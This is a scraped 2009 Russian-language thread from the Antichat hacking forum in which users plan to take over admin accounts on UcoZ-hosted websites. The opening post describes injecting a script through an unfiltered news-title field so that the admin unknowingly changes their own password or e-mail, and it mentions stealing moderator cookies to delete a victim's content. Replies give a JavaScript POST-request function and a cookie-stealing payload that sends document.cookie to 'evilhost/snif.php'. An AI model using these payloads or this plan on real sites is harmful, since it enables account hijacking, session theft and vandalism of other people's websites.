Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Найден способ взлома UcoZ! |
08.01.2009, 19:15
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725
Репутация:
22
|
|
Найден способ взлома UcoZ!
Все мы знаем, что UcoZ неприступный и уже все головы сломали (ломают) как его взломать.
Cookie админа украсть не проблема, даже если на форуме выключены HTML теги.
Но! По умолчанию в UcoZ стоит привязка IP к админу. Тоесть куки то мы украли, но войти не сможем. А админ не станет эту привязку просто так отключать.
Но привязка IP модератора по умолачнию выключена.  так что вы можете украсть куки модератора, войти под его логином, и удалить все темы, новости, и.т. д.
По идее то нам зачастую это и нужно - насолить бедной жертве =)))
Но нам это неподходит. Двигаемся дальше.
А что если админ сам себе, не подозревая того, сменит свой пароль на нужный нам? =)
Именно так мы и поступим.
Дело в том, что в форме добавления новостей не фильтруется поле "Название материала". 
А что мы можем с этим сделать? Можно здесь вставить скрипт перенаправки на сниффер, но нам то куки админа ненужны.
А вот что! =)
Мы внедрим файл в заголовок нашей "злой" новости! 
Создаем любой файлик. И в него вписываем код.
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
Теперь заливаем его на сайте который хотим взломать.
Это можно сделать например так:
Зайти на форум. В форме написания сообщения прикрпеить наш файл( там есть кнопочка "Обзор", вот через нее надо прикреплять) Сообщение напишите произвольное.
Когда нажмете отправить, увидите свое сообщение, а чуть нижу будет написано " Прикрепления: "название файла", его размер".
Наведите курсор на название этого файлика и увидите в нижнем левом углу ссылку на этот файл.
Незнаю как у вас, а у меня, в Фаерфоксе, можно сделать так: Клик правой кнопкой по ссылке на файл, выбираю там пункт "Копировать ссылку". И все, ссылку у меня в буфере обмена.
Ну а у кого неть такой функции, придется набирать ссылку ручками =)
Теперь идем создавать новость.
Новость напишите произвольную.
Это не имеет значения, нас интересует строка "Название материала".
Туда вписываем
<script src="../путь до файла"></script>
Например у меня так:
<script src="../_fr/0/0962166.img"></script>
Видите у меня полсе ...src=" стоят 2 точки?
Это не обозначает "адрес сайта который надо взломать"! Так UcoZ воспринимает адрес самого сайта (главной страницы).
И вуаля! пароль изменен нам на нужный
Вот только пожалуйста не кричите на меня, но я незнаю кода, для POST запроса. Я с ним не в ладах))
Если кто может сделать этот код, то пишите тут!
Собственно для этого я и сделал тему)
Вообщем нам надо только сделать этот код, и вставить его в файлик, который потом заливать будем на сайт! И Все! Считай неприступный UcoZ взломан  |
|
|
08.01.2009, 19:37
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
я конечно не знаком с системой ucoz, но вроде везде где идет смена пароля требуеться вести старый для подтвержения.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Вот самый простинкий ajax запрос:
PHP код:
url="admin.php";// адрес куда будем передовать
function sendRequest(params)// в params переменые передоваемы в пост запросе
{
if(params!==""){
req=initXMLHTTPRequest();
if (req)
{
req.onreadystatechange=somedo;
req.open("POST",url,true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);}
}
}
function initXMLHTTPRequest()
{
var xRequest=null;
if (window.XMLHttpRequest){
xRequest=new XMLHttpRequest();
} else if (window.ActiveXObject){
xRequest=new ActiveXObject
("Microsoft.XMLHTTP");
}
return xRequest;
}
function somedo()
{
}
Последний раз редактировалось AkyHa_MaTaTa; 08.01.2009 в 19:54..
|
|
|
|
08.01.2009, 19:57
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725
Репутация:
22
|
|
А ты можешь его подогнать под конкретно Укоз?
|
|
|
|
08.01.2009, 20:00
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Artemik
А ты можешь его подогнать под конкретно Укоз?
Зарегай мне акк на укозе, или дай какойто, я хз че там передаеться.
|
|
|
|
08.01.2009, 20:00
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)
|
|
|
|
08.01.2009, 20:08
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от iddqd
Лучше сделать через обычный csrf- автосабмит формы, потому как XMLHTTPRequest не отправит запрос на сторонний домен(если этот файл не приаттачить)
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
|
|
|
|
08.01.2009, 20:14
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
В этом коде будет содержаться POST запрос с помощью ActiveX.
Код мы вписали.
ТС, ActiveX работает только в IE.
И в src можно указывать любой валидный url, не обязательно атачить на это же сайт js файл, легчше на свой сайт залить и в src его указать.
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
Универсальный способ отправить POST-запрос с помощью html и js:
PHP код:
<iframe width=0 height=0 id=lol name=lol></iframe>
// создаем невидимый iframe для того, чтобы отправка формы не вызывала перезагрузку страницы
<form name=myform method=post target=lol>
// создаем форму, в которой target - это наш iframe
<input type=hidden name=c>
// здесь любые данные, в данном случае cookie
</form>
<script>
// теперь очередь js
document.myform.action='http://evilhost/snif.php';
// устанваливаем action на наш сервер
document.myform.c.value=document.cookie;
// записываем в hidden-поле данные cookie пользователя
document.myform.submit();
// отправляем форму
</script>
мм, если он создаст на том же сайте <script type="text/javascript" src="http://любой_сайт/path/script.js"></script> и регьюст будет идти на тот же доменик то все отправиться(а имено это описал ТС)
так работать не будет!
Последний раз редактировалось [Raz0r]; 08.01.2009 в 20:19..
|
|
|
|
08.01.2009, 20:29
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827
Репутация:
48
|
|
А с помощью Flash можно отравлять запросы?
|
|
|
|
08.01.2009, 20:37
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 31
Провел на форуме:
46725
Репутация:
22
|
|
Razor нам ненужны Куки. Нам надо, чтобы через этот пост запрос админ переходил в свой профиль, и менял свой пароль. Я точно непомню, но вроде переменная, в которой вводится праоль там называется passw. Но, я сейчас придумал другой варинат. Если неполучится изменить переменную пассв, то можно поменять не пароль а e-mail на свой. Потом сказать что ты типо забыл пароль и тебе на e-mail придет письмо. =)
Ну зарегайте любой сайт на Укозе, это быстро же и покапайтесь =)
ucoz.ru
Но, я вроде уже придумал код, но сегодня выложить немогу, ждите до завтра )))))
|
|
|
|
08.01.2009, 20:39
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от [Raz0r]
Same Origin Policy не позволяет делать AJAX-запросы на удаленные сайты, поэтому в <script src=""> необходимо указывать скрипт, находящийся в пределах того же хоста.
так работать не будет![/url]
БРЕД, ТАК РАБОТАТЬ БУДЕТ,И ЭТО МНОЮ УЖЕ ПРОВЕРЯЛОСЬ НЕ ОДНОКРАТНО!!! ДРУГОЕ ДЕЛО ЕСЛИ ВЫ ИСПОЛЬЗУЕТЕ В САМОМ XMLHTTPRequest запрос к другому домену то да, этого сделать не получиться. ЕСЛИ НЕ ВЕРИТЕ Я МОГУ УСТРОИТЬ МАЛЕНЬКУЮ ДЕМОНТСРАЦИЮ ЭТОГО
Вот почитайте
http://javascript.ru/ajax/cross-domain-scripting
Наиболее известный транспорт, позволяет такие запросы - это SCRIPT, т.к <script src="..."> может подгружать яваскрипт с любого домена.
Сообщение от [Raz0r]
ТС, ActiveX работает только в IE.
мм, если вы подразумеваете что XMLHTTPRequest в старых браузерах от ие был не native object а вызывался через ActiveX, то да, но если вы посмотрите на код, то там идет проверка на это, в остальных браузерах с подержкой XMLHTTPRequest он идет как native object и в новых версиях ИЕ.
Последний раз редактировалось AkyHa_MaTaTa; 08.01.2009 в 20:49..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
